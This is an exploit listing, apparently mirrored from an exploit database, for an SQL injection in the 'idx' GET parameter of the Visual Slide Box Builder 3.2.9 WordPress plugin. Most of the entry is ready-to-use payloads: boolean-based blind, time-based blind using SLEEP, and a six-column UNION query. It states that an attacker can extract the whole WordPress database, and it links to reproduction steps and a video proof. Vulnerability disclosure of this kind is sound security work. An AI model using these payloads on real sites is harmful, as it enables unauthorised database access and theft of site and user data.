Share
## https://sploitus.com/exploit?id=PACKETSTORM:167722
## Title: WordPress 6.0 - Visual Slide Box Builder 3.2.9 SQLi  
## Author: nu11secur1ty  
## Date: 07.11.2022  
## Vendor: https://wphive.com/  
## Software: https://wphive.com/plugins/wp-visual-slidebox-builder/?plugin_version=3.2.9  
## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/WordPress/2022/Visual-Slide-Box-Builder-plugin  
  
  
  
## Description:  
The parameter `idx` from the Visual Slide Box Builder plugin app for  
WordPress appears to be vulnerable to SQLi.  
The attacker can receive all database information from the WordPress  
database and he can use it for very malicious purposes.  
  
[+] Payloads:  
  
```mysql  
---  
Parameter: idx (GET)  
Type: boolean-based blind  
Title: HAVING boolean-based blind - WHERE, GROUP BY clause  
Payload: action=vsbb_get_one&idx=1 union select 1,2,3,4,5,sleep(3)  
HAVING 1854=1854  
  
Type: time-based blind  
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)  
Payload: action=vsbb_get_one&idx=1 union select 1,2,3,4,5,sleep(3)  
AND (SELECT 3837 FROM (SELECT(SLEEP(7)))QHbL)  
  
Type: UNION query  
Title: MySQL UNION query (NULL) - 6 columns  
Payload: action=vsbb_get_one&idx=-5038 UNION ALL SELECT  
NULL,NULL,NULL,CONCAT(0x716a626a71,0x4e6b417358754d527a4a69544c57654a53574a64736b5a656e4b7968767a7a4d454243797a796d72,0x717a7a7a71),NULL,NULL#  
---  
  
```  
  
## Reproduce:  
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/WordPress/2022/Visual-Slide-Box-Builder-plugin)  
  
## Proof and Exploit:  
[href](https://streamable.com/jlp5sx)